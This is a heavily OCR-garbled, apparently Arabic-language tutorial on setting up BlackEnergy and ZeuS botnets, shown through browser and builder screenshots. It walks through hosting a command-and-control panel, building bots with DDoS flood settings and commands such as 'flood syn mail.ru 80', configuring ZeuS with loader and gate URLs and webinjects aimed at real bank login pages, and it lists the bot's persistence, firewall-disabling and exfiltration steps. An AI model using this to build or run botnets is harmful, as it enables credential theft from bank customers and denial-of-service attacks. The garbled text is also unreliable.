Transform 


selected e 


ntries: | Copy | | Move 


Ce ete | Rersi-e 


CH-op | 










| Unap | 


All Name Tvoe 


Size 


Owner 


Group 


Perms 


Mod Time 


Actions 


m 


















□ • 


MvSOL.pho PHP script 


513 


15503535 


15503535 




Nov 1 11:05 




Edit 


□ • 


auth.php PHP script 


1505 


15503535 


15503535 




Nov 1 11:05 


View 


Edit 


□ © 


cmdhelp.html HTML file 


1517 


15503535 


15503535 




Nov 1 11:05 




Edit 


□ • 


confia.php PHP script 


309 


15503535 


15503535 




Nov 1 11:05 




Mt 


□ • 


index. php PHP script 


5379 


15503535 


15503535 




Nov 1 11:05 


View 


Edit 


□ • 




987 


15503535 


15503535 




Nov 1 11:05 




Edit 


□ a 


stvle.css Cascading Style Sheet 


807 


15503535 


15503535 




Nov 1 11:05 


View 


Edit 



Directories: 0 
Files: 7 / 10.76 kB 
Symlinks: 0 

Unrecognized FTP output: 




.Chmod ii> jfcll f3 c^LJI jUikU ^ j config.php <j-«UJI permission ? j& 



Si Art lit nqriii IMiix... I>C T Hrvrlrtprrl li... _/ 7 Oimjimi fily 



7.,... HwlFyrum, HnUm... Hnw 7m Rl 

■ - ■ ■ | - -ii ii-. I II ,1 in (l.f> I ■ ■ ■ tiiJ-. 



1 

Chmod directories and files 



►lit A Ren hit... £3 ii* uvfeHnl' wiMJl Ge&fl!* I I better ■ M»t i «4f#c* - 



31,220,16.249 



•eteN pn» 






kJRudb'jwntal. £>ccuto 








Oroop ; 




















To set a II pe 


rmisaicr 


n to tho j-arr 


a voFuen, <9r>t<rlhDH paimiHHiona and click on 


thta buHc 


r» "Set all parmiasiona". 



Set the parmiiiiona of file 



p to: 



Owner; Ptee,ad[?)Wr*# Qbx*cuc« 

C u: ■'Wt-.nl ".WJiK' I »c 

Clunio J valuu: CCMS 



.666 permission j^? ^ 
.edit cb* jfcll f3 d jUlkl config.php ^ ^ uVI 



■l 1 ■ 




b... «^ Tool Dr.gon Oty To .. HKkF« 



c- a - ........ /> -cr d ♦ * 

Hew To B.i. 1.1 A Botn«... »_ J ^»UI Goool. botnet . cldot . ■ 



• opt | • ti.yfJlJr-Ji • 1 

C ope ( • tf.Y»«i_P«»" ' J 

• opt 1 ' ir.v»^J_t»" " 1 



£jJaj JjVI ^ Cilia AiLjalajVI ^3 J* L-bud^ ^^ic t flllkj C5"^J Config t 4*jJa ^ J^j tfljlm AjLujU <J^-^ 
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Pi f*t y«w Hiftory Bookmarks loots ti*p 



^ t# file-manager.hostinger.ae'3,'index.php 



^ Egg List | Dragon City ... R ^uii Get random gem [Max... DC Tool - Developed b... _y Tool Dragon City - To... Hack Forums - Hackin... How To Build A Botne... £<J ^ u^oLd! ujl>UI Google botnet . ddos . attack . 



Normal textarea < 



File: /public_html/vwWconfig.php 



Status: This file has not yet been saved 



// ian66ieee aaju 

$opt [ 'in^3Cjl_host ' ] = "rr/ysql . r.is-inger .ae" 

$opt [ 'iir£3crl_user ■ ] = "u7603S6295^otdb"; 

$opt[■I^ X 3c i l_pass■] = •»*********»; 

$opt [ 'm^3crl_base • ] = "u7603S6295_botclb"; 

// eiaei e iaM e MiMM 
$opc [ 1 admin_JLc)Cj[in , ] = "root"; 

$opt [ ' admin_pass ' ] = "toor"; 



^jlJ j .aJUII aJL^\ kia auth.php < aUll ^ jL*JI ^ cAjjjaJI 4_>U1> ^jI> jJU ^UJI C&C ^ ^ jj* 

http://drmohammedteba.890mxom/www/auth.php JUJI 



fMe frirt Umw Hiftory Bookmarks look H^te 



j & drmohammedteba.890m.corn/www/auth.php 



0 Egg List | Dragon C'rty ... El j.ijc Get random gem [Ma> 



DC Tool - Developed b... Tool Dragon C'rty - To... L J Hack Forums - Hackin... [..] How To Build A Botne... ^ u^oisJI 



P\ <Cr £ * ft ®- I = 

l>UJI Google botnet . ddos . attack. ... » 




jl MySQLj PHPj Apache i> l£ c^ib idlilj 4> ^UJ! jl^JI ^ JA^b ja ^121 aSjjUI 
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http s : //bitnami . com 

jj jl jit <li=^ uj ^ (j-o j DDNS ^l^c-V cJUl<JI Jjijjoj Jc no-ip J Jj> > iuIU ^ jij ^l^VI a»j ^5 AiLuJ! 
J5Lk <> ^1 j >V j2 j! Jl c> ^1 j PORT FORWARDING ^ 



El 



XAIVIPP Control Panel a/3.2.1 [ Compiled: IVIay 7"-th 2013 ] 

XAfVlPP Control Panel v3.2.1 



C 



M oclules 
S e rvi ce 



Module 

Apac h e 
MySQL 
File^illa 
Mercury 
Tomcat 



P e>rt(s> 



Acti oils 

S-tstrt 



Admin 
Admin 
Admin 
Admin 
Ad mi n 



Config 



Config 



Config 



Config 



Config 



Logs 



Logs 



Logs 



Logs 



Logs 



Config 



Explorer 



Services 



■-^ Help 



10:29:28 AM [Apache] Attempting to stop Apache (RID: 1924) 

10:29:29 AM [Apache] Status change detected: stopped 

10 2 9 2 9 AM [mysqlj Attempting to stop MySQL (FID: 9356) 

10 2 9 2 9 AM [mysql] Status change detected: stopped 

10 3 1 0 2 AM [mysql] Attempting to start MySQL a pp. _ _ 

10 3 1 0 2 AM [mysql] Status change detected: running 

10:31 19 AM [mysql] Attempting to stop MySQL (RID: 2112) 

10 3 1 2 0 AM [mysql] Status change detected: stopped 

10:40:35 AM [main] Executing " c :\xa m ppV 



F 



kK^h»lt'phpiiivfliln'i,iri, "PM/,URL-1.j*r.er_5qt.phpTdb-BcI<b»e-&i«ivcr- iai»rqel-6it<>k<n--1ia.ZeeJid9flj3a3«^flJ^ 
^ bgg List I Urag 0*1 Clrty ... Kl -±>j* is+i* c - Ciet random gom | Max... .' OC PooP Developed b... _j PooP Dragon Crty Po 

phpMyAdmfn 



How Po SmPd A Kotm .. f$ ^ ^^nJ] -*^UJ\ Ciooglc O botnet . ddiw . attach . 



St * 4* <* 

information . schema 
jji myaqJ 

pi h T-rii riKirn: i ■ :,*LM«-n nj 

phpmyBdmsn 
1 « • 1 



Urjlcibows U 5UL |k, Siolus * Uhth j^J. fc*port |£) Irnpml SutUiips J Huplicoliofi £ VoHublea ^ Mote 



Run SQL qiierY/qu e rles on server " 127.0.0.1'": un- 




clear 

BooKmark this SQL query 



I Delimiter J .•>• Shew this query here again i Retain query box 



uV statphp PHP ^ ^ POST e !^L,U l^i e j£ cjjJ! s tat J J *^ J 

.(^U3I j^l) j ^Jaj^ill CjjJI ^ ^^xJ AjjL^a^Vl CjUUJI jjs jj Sj^lS J^lalll "time" 



: 3C 



[Ep starting from record S c 
node and rBpeat headers alter 



lLffi- cells 




BGG7472 3DBC9 

66S742& 3QBC9 

G6S7474 3DBC9 

6637461 3DBC9 

6637476 3QBC9 

669745D 3DBC9 



BSSS23B 3DBC9 

5SB7432 3DBC9 

66374S3 3DBC9 

66374.79 3DBG9 

BSB74T1 3DBC9 

ees74sn 3nraca 



C&C php file Jj^^"; tdjUUJI o^clS ^Uijj ^su 
f3 c>j Apachej PHP J^-^ c5^^ s^j^^ 

(ibj'j MySQL ^ config.php ^ 

(_^jljj (jC (jLalJ ^^^jll (J j^^Jl (Jj^jujJ 4_jujLuj (^^Jc (Jj^aaJ 

J ^ .config.php ^ ^jljll o^j^^ 



"Preparing the bot for the Client" J^t ^ ^\ :2 Sj^l * 
J^ll) .bot executable J ^ -> ^ Jj^I ^ ^ ^ ^j^ cjUi^xJI ^Jjj s >^JI ^ J 

.(BlackEnergy Bot >j 
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C5 £jiij jl C5 Joiij Vj .C&C DNS ^ ^ UU*jJaj ."Host/f^^" j& ^ W^-^j ^ ^-iuujjII 

CjUUJI ^j^Ij ^ jfc L^jI "http://drmohammedteba.890m.com/www/stat.php" ^ ^ ^ stat.php J-^W 
c> j^ii ^IS ^ cjjJI ciljLJl fjSlI £^ U ."f/se polymorph exe" j "t/se cry/?f traffic" J aLIUI ^j^V! 

jjaxjJaluaxll" Qiqu^i^ll AjL^aV jj^tluax (jVI j liiiill Jjta dj jJ L_flL ^Ujj ^jj '"Build" jj^ (Jj* 




HOST: I http://somehost.net/stat.php 
Request rate: |~10 



(in minutes) 



Build ID: |5EEF91D 

Default command (if can't connect to server): 

I* 



ICMP Freq: 
ICMP Size: 



I wait 



Execute after | 30 

minutes (0 - execute immediatly) 



Outfile; 



|_bot.e 



Build 



Syn/Ack: 

SYN Freq: 

HTTP Freq: 
HTTP Threads 
TCP/UDP Freq: 

UDPSize: 
TCP Size: 

Spoof IP's: 

□ Use SocksS 
|~| Use crypt traffic 
l~l Use polimorph exe and antidebug 



(1 - ON; 0 - OFF) 



"Implanting the bot to vulnerable hosts" p\i**al\ uth'^ £jj :3 SjkkJ! J_ 

c ^j3I j (j-a ^1 jVI Jl^U j command ji^nti 5-^Ui3l ajI^j c_u^ diii jJU 4 > ^11 3_JjUi J!>tk ^ t^lli j 



■ 


■■ H 


■ 


1 :: \ \ ^^^^H 


, ^ ^ drmohammedteba.890m.com 




v e H~ Google 


p\ m ♦ * 1 = 


^ Egg List | Dragon City ... fi d^j ^juuo Get random gem [Max... 


. DC Tool - Developed b... ^ Tool Dragon City - To... 


Hack Forums - Hackin... ...j How To Build A Botne... | 


33 o-o (juilsJI Cjl>UI Google botnet . ddos . attack . ... » 


total bot's: 0 
bot's per hour: 0 
bot's per day: 0 
bot's for all time: 0 
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Botnet Commands 

jjjjj ^ .ajuouj jll ^IjjI 4J1 ^Jj J^axJI cjjj ^ reverse- engineered CC code 

j ULkj J^U .4^ j J! <iI3U ^>J1 o^J ^l^uJ! cmdhelp.html j README.TXT ^AiLJI ^ ^ j*' jVl 

.^aljVl ^g£j U jCO ,6.1c. Lola! 1 CjliLa 1 g LjJ jJ ^JJ ^aJ ^^jll 4 cilU& <jt tj^iajl 

:Flood 

^ ^ jj ^jc Cj jJ! ^LujjV j-^Vl l^gi CjUAl-<JI , CjULjajiill d iLa^a (j-G 3 alia a ^1 ji\ S^c cj jJI lS^c- flood j-*^ 

/v /v 

-A A A A A ICMP 

W >v w w 

-A A A A A UDP 

/v yv /v /v 

-A A A A A SYN 

/v yv /v vs. yv 

-A A A A A HTTP 

/v yv /v yv 

-A A A A A Data 

flood syn www.abc.com 25 #10# ^ 

:80 ^1 TCP SYN cjUL^iall iiiiil Cj jj Jjy^J cjUuL^I JL-jU ^liJI f lJ 
4500;2000;100;l;0;30;500;500;200;1000;2000#flood syn mail.ru 80 #10#xEN-XPSPl_80DlF15C 

:Stop 

mLyiJ ± cjUU^iil Us&Jl bot client stop 

:Die 

>(JJJJ JI 3Jaj^l ajLJI API ExitProcess ^^-j .l_jL^JI ^Ikdl ^> ^aij cJi^J bot client ^ die j*VI 

:Open 

Iajj jl Ajiull <LU1I djliLJI (Jaa^j] a.^lnn ^jl (j^-dj ^>*V1 I^a ^jl bot client lS^^ lH^j .l3^ ls* ^ 

:Wait 

^ Sjja Asu s^iu^JI j-oljVl J^l C&C JL^aj'Vlj laUij ^LSII qj± duj^al! ^ I jsll ^ bot client liA 



Architecture of the Botnet: 
BOT CLIENT 



st a t . php 



POST dsts 



ATTACKER 

1 . 

Auth.php 



2 . 



Coinf ig-.php ( MySQL Login ) 

( Admin Login ) + 



3 . Succes sf ul Auth 



I n d e x.. ph p 



DATA LOGGING 



Db Tab] 

O pt 
sts -t 



*- MySQL.php — 

( Connecting to DB ) 



Fetching the stats after DB autherticati 01 



T 



. Displaying stats on the LJ I 
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ZeuS Botnet 

J^J s-lil&VI Jc- ^jlaiJ <ln^Jl LI jill tillj £a O^J '4_A*VI CjL^L^VI 4-^1 j-<J (j-aVI cJ^^ J cJ J 1 ^ ga^L&SI (J-^ ^ .oJ-lJ 

tAjjJaUJI <LM CjI jluJ! Jc .(jVI ^Jc- j& Ia^ lS&^I ^ jJJ^SI ^2 ^L^JI l_ .l^jajjoi 

<J£ £-<^ J 4-Aj^VI ^jUtj ^aL£3l (jl l^jLuj (j-a ^^jll "ZcilS" U^jO L>^ ^ ^ M1 * 1 ^ > «all CjVIj^jVI j <J-^I (J^*^ (J 1 ^ uj 

<L^)IaJ UL^jJall (j* 4 > ^ill dlLa jIslxJI 

J jVl ^atL<Jl J j& .6^ j^. djIjjiilLJl (j-a ^ j^. j t . UjuoJ Uj^^ *M na^all JJ jnj^Sl 6^)^.1 (j* ^J^slSI ^31 ^jJal jll j;iC. <j^ 

AjtlaS S^lc ^a^ij tilli (j-a Will j Jc CjIj jjj^)3I j\ 4\))\\\ CjLi^g^JI ^j* 4jtia3 C-jjou] Igil .(J^jO ^ J-**^ J^ <L^)Ia3l t > nun 

4_J^Ua>J| SjLjall £y± ^ (j -0 L - J ^J^^' V ^^JjoiaII ^-<ujjJ jjujj ^if^ ^ (J-*^^ 1 ^all 

, (jj^ 70 ^2^>^ (jc a! jjjoixJI 

http://www.darkreadingxom/attacks-breaches/fbi-bust-another-z 
victim-losses/d/d-id/1 134475 ? 

^jjjjoixi jjc. ^Iaj] (J jll jAj^aII 6^)ijai ^jc ^-IjaVU ^ajuj j .SpyEyc Trojan ^ jj ja " i c5^>^^ ^ ^ ^Iac 

^jij dii^ ^ Jlxij dij jjjVI ijia ^u** ^ s jA-bUJI CjSjI! J Botnets j c> '^'j Zeus Botnet 
ajs ^IUa lS^*^ 5 •^f juj " Bot IVIaster -Jl ^ j K- * >1 c_ aLij^a j> j CjUg ^1*^ ^SaA Jc Ui <J£ lI*-^ 

Jid ^jl jikVI djUl^ ^ j^l^SI Jj2 ^^kiauJI qia j^l ^UjojU ^ujli jii^j ^il j^" Mai ware Honey nets ^ 6 ^ 
uf- ^jWc- > Zeus Bot > j^. j http : //www . malwareurl .com/ , http : //www . mal waredomainli s t . com 
. Web Browser-^ jt ^ > ^^ t c> ^ f^ 3 ^ & Command & Control Center -Jl u' c^*^ Http Botnet 

Spreading & Infection.-^ 

j^a ^l^kl^U CjjJI 11a f jLj ,o>jjll ojalLl c> SjWc- cPU J j H/^/i /f/s'A: Malware < *^ > ^j Z^ws 1 Botnet -SI 

c5^l keystroke J^-^ lU^? ^j^i A:ey loggers -SI jl USa UUj L_alik^ J£aij key loggers -SI s Ujjsj 

.Form Grabbing Technique -SI ^jiill ^ ^ Zeus Botnet -SI ^^ki^JI ^jL 

til^jjj ^i^J ^i^L tsLl ilia jjsj HTML cj Uq^i Forms J ^l^t ^ ^cr^ -^^^ ^ Form Grabbing 
j JjJ^VI ^^J^ ^ j Password j username ^ Jjj^VI Jl Jj^^l ^jjj j ^jjj^VI 
j filed Name -SI j <J POST lU*j c^S U JaliiSb form grabber -SI U^j ^ cs^t ^ 5-^UJI aj^JI 

.http sniffing password=123456 j username=admin ^ filed value 

J <jLk J ^ j£i La J£ ( . ilai J Ajjjixk ^j£-<ua c ^jojLojI cJ^j ^jSr> a^Ixj j^i Zeus bot Sh^JI *^j^I 6 ^ J 
post -SI JUilojU ^ill gate.php l^Ul^l ^Lj fe^p webserver Jj cjUjkJI JLuo jl ^Lj ^jjjill 

CjIj^I a - ^aii jjj^)3I ojbjj ^UJ j^UI CjIj^VI <liiaJI ciA-i^ ^j;^ ^juiixJ jj ^^jI! CjIj^VI a j& Zeus 

L_aLi ^LauU ^ajolS l_a jjoJ Builder tool Sl^l .^-x-^j^^^l djLd jIslxJI ^jhvy^bjlujl j ^CjIj jjj^II l_ ua^j/Jc Jal q^SS jl ^nJaUli 

.ZeuS botnet (^^^^ ^-j^ ^1 ^^-^>^l (j -0 ^Uli cIajj jJI jl ^.1 j 
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c > u>i^ (^^icj "moddcrs" cs-^ tcijUSlI l-a^UI ^jjla>» <JjS Jal jIxjuAj ^iJJ CjIj^VI a^. a ^ aJa*^ 

,^Uj 4j£l j a j-q ciJl!i3l jIaj^VI j ^A^jjudj L_a ^juj La !a& j <^-^ j J jVI jl-^^yi cs-*^ 

Building 4- 



^5 djUL 400 ^ ^ uj^ u' (_>axJ (jSaja 6 11a Jlo j±£ ^jj^ £f .Visual Studio ^ ^ jj^^ 

^jAsII jljUl ^^Jc SjlaJ 4ja3 (JjjjJJ .1-1^. AjAilflj WindoWS CUlls ^iAklajU C ++ ^ajuj^ ^ JJ J ^ U ^ 4JC^ ^ t^UijVl ^jUr> 



u^j^J c> ^1^1^ 'Microsoft Visual Studio c> uj^ u' 



^ill aL^I -Li^jj ^ cmd ^ Jj^-^W 'Microsoft Visual Studio vlO 4^ uj^ u' l>-j^ j 

.s jj^Uxi L_aLJI Iaa jiill J^Lk ^ jl ( jjj Wil l <jLc; ^aJ make Jullxmd >«VI <jjjjjJ CjUL l^j^ 



make, cmd 
make_debug.cmd 
make default. cmd 



manual en. html 



Sources uploaded 
Sources uploaded. 
Sources uploaded. 
Sources uploaded. 
Revert "encoding experiments" 



4 years ago 
4 years ago 
4 years ago 
4 years ago 
a year ago 



til*]) Ji\ UiA^L di^V) f iJilyib tiUij vlO ^^Jl Microsoft Visual Studio p\¥un\ £l CjJj) lit ;4iajalA 
Microsoft Visual Studio ^ c^^l cfe^ maA:^ ^j^Jt buildconfig.inc.php 

35 //^"e5a edx See eCii"eeydC5o . 

36 Jdir[ 1 vcdlls 1 ] 

37 $dir['vc'] 

38 $dir[ 1 sdk 1 ] 

39 Sdir[ 1 vcbin 1 ] [ 'Win32 1 ] 
43 $dir[ 1 vcbin 1 ] [ 1 win64 1 ] 

41 $dir[ 'sdkbin' ][ 'Win32' ] 

42 $dir[ 1 sdkbin ' ][ 'win64' ] 
43 

Configuration and Bot Creation 4- 

iCJd jjjjIU Jl^iVI ^ cjjJI ( aUli Iaa jfkj diia. .Config < a!ac-I iiiiLl! JjUSI Cj jA\ < aL> ^Lb ^ J jVl S j^^ll 

^A US 4(jJI ja. (> JjSSj Config "-ii- .<^J <^ J U*^?- cs^ 1 CjliUJ! (jc. CjU jkxi ^ 4j| USj 

:^Vl£ Edit ciji jisll ^ Builder ^iil fS "zsb.exe" Vji *Mi7rfer ^ Config J>-»jll 



'C: \Program Files\.Microso-ft Visual Studio 16 . 0\CorrTon7\I DE ' 

'C:\Program Files\Microsoft Visual Studio 16.6WC 1 ; 

'C: \Prografn Files\Microso-ft SDKs\Windows\v7 . ' ; 

$dir[ 'v/c' ] . '\bin' ; 

Jdir[ ' vc ' ] - ' \bin\amd64 ' ; 

$dir[ ' sdk ' ] . ' \bin ' ; 

$dir[ ' sdk ' ] - ' \bin\x64 ' ; 



ZeuS Builder 



Builder 

Source configuartion file: 



C : ■■JUsers ^amar \Desktop \ZS_2. 0.8.9 guilder \jconfi Browse . . . Edit. . 



Build the bot configuration 



Build the bot executable 



I L 
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.ILL* U j£i U£ jjjj ^ uj^ ^ ^ j Config j&^j edit j*^' ^ 



® 


windows 8 [Running] - Oracle VM VirtualBox 








config.txt - Notepad 


a KB 


File Edit Format View Help 



1; Build time: 04:00:05 03.11.2014 GMT 


A 


;Version: 2.0.8.9 




entry "StaticConf ig" I 




;botnet "btnl" 




timerconfig 60 1 




timer_logs 1 1 




timer_stats 20 1 




url_conf ig "http : //localhost/conf ig . bin" 




remove_certs 1 




disable_tcpserver 0 




encryption_key "secret key" 




end 




entry "DynamicConf ig" 2 




url_loader "http : //localhost/bot . exe" 




url_server "http : //localhost/gate . php" 




f ile_webinjects "webinjects.txt" 




entry "AdvancedConf igs" 




; "http : //advdomain/cf gl . bin " 




end 




entry "WebFilters" 




"!*. microsoft. com/*" 




" ! http : //*myspace . com*" 




"https ://www. gruposantander.es/*" 




" ! http : //*odnoklassniki . ru/*" 




" ! http : //vkontakte . ru/*" 




"@*/login.osmp. ru/*" 




"@*/atl.osmp. ru/*" 




end 


V 


< 





E 



10^#Qeii <§ (±) Right Ctrl 



Static Configuration .1 

bMk'y\ ^aJJ LgAjC d jA\ \ g ^>H^J L_fl jjoj dLi jlx-<Jl Jc <_£jJ^J 4il .e-LuuVl Sbl <Jajoj| jJ d jjll ^fl StaticConfig dUlax^ *U^.JJ ^aJJ 

,^j^JI d jJ! 4_kjaij (Jj^^j] d jA\ j-ajj (jl * . StaticConfig L '"\i w *^ JjV 



d jj b* ^311 dii jJl "botnet" 

.dynamic configuration L^yz c& "timer_config" 
JIjjVI ^UJ ^L^VI dU jkJ! jA^jSjA\ d^J! dUL jjj ^ jll J^lill "timer_stats" j "timerjogs" 
Black Energy botnet J ^M-^ ^ ^ ( Lu^ l ^UJ3 URL u' "url_config" 

, "dynamic configuration" J^- ^jJi 

ji jj jl^a. jj jl£ b] U ^j^j] ^UJI ip q\ ^ <ul*j d jA\ dii^ URL ul j^- "url_compip" 

."urljcompip "http:lllocalhostlweblip.php" 1024" ^ c> /U^aJI 
.dtj jjjjJI (J^b <Lojj-<JI dL* jlx-<Jl ^ILkV ^Aadujj ^ill jjLjSjI! ^-UL* "encryption key" 

Dynamic Configuration .2 

<j jS^d dljiia ^glc L-fllxJI 11a iJaa^j ^jj - < r i^jja3l jj jjj^ ^ Jc Asu d jJI JjS DynamicConfig cJj^*^ ^ 

.tdlij ^Ijiil ^Uacj ^j* lil t^joiij ^ ^^j^. mj Jj^^'^ di jJl (j^j URL "url loader" 
.l^iij^j j dliLJI j dWL^a^VI j d!l^uaJI "drop server" JalS^VI ^^UJ URL u' "url_server" 

jj* jjj-<^3I jl^j> l^Jj j^ajj c _^j3I dLaij^a AjflLjaj J jSa. ^jSa. J ^AklauJI dLd jlx-<J! "file webinjects" 

.build the bot configuration Jj^ j^W Config ^t^t (> ftfc^VI ^ 

Building the Bot *k 

^jIj VjI . ^jaMtt (Jjiili d jj3I t *aUj jiJUj ^ jj^JI Config t a ^ ^^-M ^^Jl sbl ^l^kiujl ^jj j^lj>. Config t uj-^ ^j^^ 
jUiJI ^AklauJI ^ kxj 6^ j bli V ^jl (Jjjjj j d jj dujjj ^j bj Ui AijsLxJ aJc jjj*^ u^^^J Zeus builder 

;^aUaj3l ^jc dLd jIslxJU jjjsj ^ kxj L_A jjoj Builder .Config dbl^c] jUlkV lS^^ <LcaJ j jj^aLJ! b^ Lajj .^Uajll c qjhvil 
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ZeuS Builder 



Builder 
Settings 



Information 

Current version 



Version: Z.O.S.9 

Build time: 04:00:0 5 03. 11.2014 GMT 
Signature: warrior buy source 



Information about active bot 
Encryption key: 



Information : 



Bot not founded. 



Remove bot: 



.cjjJI cjUL <> JLl ^U^3I q\ ls ±u Bot not founded Jia.5U 
<y*^ "build the bot configuration" jjll <ija jfcll '"Zeus builder" ^l^ki^U 

.DynamicConfig dj jJ3 c ^jja^H ^£1*11 Ig/mJa j t aLill 11a L*.ijc- , jLSuJI <S£Jj 




ZeuS Builder 



Settings 



Builder 

Source configuartion file: 

I C :\IJsef5\samar desktop 'i,ZS_2. 0 . & . 9 guilder Vpon It | | Browse . 
Actions 



] [ 



Build the bot configuration 




Build the bot ex 


=cu table 





99 =https : //www . nwolb . com/Login . asp = 

1 ill ill =https : //home 2ae . cd . citibank. ae/CappWebAppAE/producttA'o/capp/ac±i 
on/signoncq . do 

lu 1 =httpa : //Internetbanking . aib . ie./hb 1/roi/signon 
lu Z=https : //lot-port, bcs . ru/names . nsf ? ^ogin * 
lu 3 = ^vellsfargo . com/^ 

lO -4 = hi t±p s : //web . da -us . citibank, com/cgi -bin/citifi/portal/l/l . do 

lu 5 =https : //web . da -us . citibank, com/cgi -bin/citifi/portal/l/autherror . do * 

106 =https : //rupay . com/index . php 

lO 7"=https : //light, web money . ru/default. aspx 

IDS = ^banquepopulaire . fr / ^ 

U09 =http : //*. osmp . ru/ 

HO =https : //www . uno -e . com./local_bdnt_unoe/l_ogin_unoe Z. html 
111 =https : //www . ■= cm . es/cgi -bin/INdient_S 10 5 

BUILD SUCCEEDED! 



<jL^i^U Jl^JI cj jA\ c^L *l£L ^ jib if&xl] jli < "build the bot executable" jj cf- 

\ 4_xaL^^j Jjllsu ^JJ PE L_flLJl m A alia a JJQ udJ £A <LUalL<» <J llfljj dj ClAiLa (JA JaxjJall (j^J 

.dl jJI ^.Uj ^aJ (jl Asu ^.uilftll 4_Iajail 4_jJa jjsuol] dlLa jIslaII ^jJa jJ filial Sjjj^ll .^J^ 



^leuS Builder 



I i i fo i n i .3 +□ c 

I =! 1 1 1 E- EJ^^^M 

Settings 



Builder 

Source configuartion file : 



C : MUaers^amar f)esktop '.^S_Z. O . S . 3 \builder \confi 



Actions 



Build the bot c< 


jnfiguration 


Build the hot e:*e 


cutable 





Building the hot. . . 
Loading configuration. . . 
botnet= 

tinner config=60nnin J lmin 

tinner logs = lmin r lmin 

tinner stats = JZOmin r lmin 

url config =http : //localhost/config . hin 

remove certs = 1 

disable tcpserver =0 

encryption k.ey =OK! 

Creating executable file. . . 

Size of output file is l-TOSOO bytes. 

BUILD SUCCEEDED ! 
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Bot Distribution and Installation *t 
"spam campaign" ^jjJI ^l >ikU dVUJI J m( j j^Vl jj j^SII * J] jl^VI s j^3! <jJ (jjJ ojjj j 

J UL^jJall ^(.iaJ £tC j/Jl ^^>JI 4_lLaij (J^lj 4_icLd^.Vl <jujA1^JI ^ jj ~ laJLujJj .-lajlj jl (J^J-a L_aL» (Jjjia (jc Lai tdV II 

4 i o HfrU Jj^ uJJ^I L-J3U aJj 4 - Va a ^-iUull J LJl6j 'lS^^ (j-G AjljujIj ^ L£ ujJ d>^ uj Jflj m Cj jA\ >jq'^ 

.<£jJjuuJ| (JjjjJ j ^I^JjujU cillij <j^aL^JI dtj* jjjjll j (JjljL^J ,j| j£Vl (j-a a a>JJJ j& A jcl al^Vl 

,dlj jjjjII a£jjou (JU^j^U j 6<joiij o^j^ j i— ujjj] dl jjn^ll ^j-xi J^c <j!^Lk ^j-d 4-^^ Ajp* > ^1 jj jjax^II Jc- d jJl Aiajj 

dl jjn^ll ^^Jfc filial Sjj^AxJ! ,6^J^JI CIjIjIAj^VI J lA JJJJU ^JJ UU^I J 6(jVI lg <OViun <jkjudi3l J ^^Jfc LiA jll dULJl S-Ldjoll 

;"Ja£a ^Jt >i Jjll" dLj jJjjll A£jjoU AJL^jI ^aJ (j-G j 4_I^jJa3l ^aUaj Jc 4 LlA^J ^aJJ LdAjc d jill lAAkjJ 

1- The install function searches for the "winlogon.exe" process, allocates some memory within it and 
decrypts itself into the process. 

2- The bot executable is written to the hard drive as "C:\WINDOWS\system32\sdra64.exe". 

3- The directory "C:\WINDOWS\system32\lowsec\" is created. This directory is not visible in 
Windows Explorer but can be seen from the command line. Its purpose is to contain the following 
files: 

■ local.ds: Contains the most recently downloaded DynamicConfig file. 

■ user.ds: Contains logged information. 

■ user.ds.lll: Temporarily created if transmission of logs to the drop server fails. 

4- The Winlogon ("HKLM/SOFTWARE/MicrosoftAVindowsNT/CurrentVersionAVinlogon") registry 
key's value is appended with the path of the bot executable: C:/WINDOWS/system32/sdra64.exe. 
This will cause the bot to execute when the computer restarts. 

5- The Windows XP firewall is disabled. This causes a Windows Security Center warning icon to 
appear in the system tray, the only visible indication that the computer has been infected. 

6- The bot broadcasts an "M-SEARCH" command to find UPnP network devices. This may be an 
attempt to access and reconfigure local routers. 

7- The bot sends an HTTP GET command to the configured botnet server to get the latest 
DynamicConfig file. 

8- The bot begins capturing and logging information from the infected computer. The DynamicConfig 
file largely determines what information is collected. 

9- The bot sends two HTTP POST commands to upload log (user.ds) and stat information to the botnet 
drop server. 

10- Three timers are set to values in the StaticConfig, each executing a function on time-out: 

o Get new config file (DynamicConfig) from server (default 60 minutes), 
o Post harvested data (user.ds) to server (default 1 minute), 
o Post statistics to server (default 20 minutes). 

1 1- If a web page that is viewed from the infected computer is on the injection target list in the 
DynamicConfig, the additional fields from the list are injected into the page. 

12- If the HTTP "200 OK" reply to a POST contains a hidden script command, the bot executes it and 
returns a success or failure indication along with any data. 

Botnet Command and Control *k 

Control Panel Installation 

A <Jala <Ljoj j J^jJ Lg£ ,d jA\ ^ > ^i^l £cxali^)J! j-g! jl JLujjIj A-ilc Sjj-ijuill j d jA\ 3JL^. Lt.nLt.nl (JJJJJJ f>^Vl A^. jJ (JJJ^ ^Vlmj 

Aj\ JJ jjjfl^l 6 j&-^l d jA\ <Jj3 (J-g <^ ^aJ dLa jIslaII <J jj^ jll j q^jxI 

4-uIa ^jSli^ 
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\ g aI^-w a j tA-iSLjaVI £c^l^)Jl (J^axJ .^^juuIjI j\ JJS Jc- Ifrl^ nil (j^J jAx^aH j^Lg PHP (JJJ^ 1 * J* f^V^l 4-^ jl 

Control ^3^^ ^-^^ uj^ ,<i>.»Ij.a1I cAijiV! MySQL - iklm* Liajl l_±^j .Uiaj) ^^Ujj J ^ ia A\ 

l$\ ^ lit .^pa^xlauiH ^j-<i l^J] J jll (j^j 4 ^ ciujjj t^lli Asu ^L-jjjll ^jIa a Jl mj (j^j Panel code 

■ http://www.hostinger.ae AiLja^Yl ^^ki^j lJj^ li* J -1 

ijYtS MySQL £AjLj $^15 *L&b pjfc -2 



Pie |#t View History Bookmarks look grip 
■ 



^ $ cpanel.hostinger.ae'hosting/index/aid/6794657 



" C H' Google 



p <x m ± it = 



uoio li ajjuuuj^l .oSjtjJI i>^J 0 ..m .nil Zeus Jl t>o„. 0 FortiGuard.com | Zeus,.,. Q How to setup Zeus Bot... II Remote Administratio... [Tutorial] Setup Zeus B... % Egg List | Dragon City ... O- Get random gem [Max... 







n 


MySQL 




-"4 op MySQL 


phpMyAdmin 


MySQL £U*J4j 



/Ul3il 4^Li3l Jinj l^j . MySQL ^) jS Jja ji^L ^ -3 



n ■ 




■i 


■ £5 








pmel ho^r^«r.a)«/d*t*b«ici/rny\ql-d«t«b«j<i''»id.'6TW*V 












•Of Z«u« Jt © FortiCJuwdcom | 7»u«.... Q M 


vw fo ..»..(■, 7»u« Uot.. ■■ R»mol» Adn 




! ..tnn»l]S*»up7»u«B... ^ f<M li«t | Dr*gon City ... & CM random f«m (Mw... w 




I AR V 








1 



jjow ^jf^xi .Mysot a.' ft MySQL ^— ^-Ajj -2C-1 

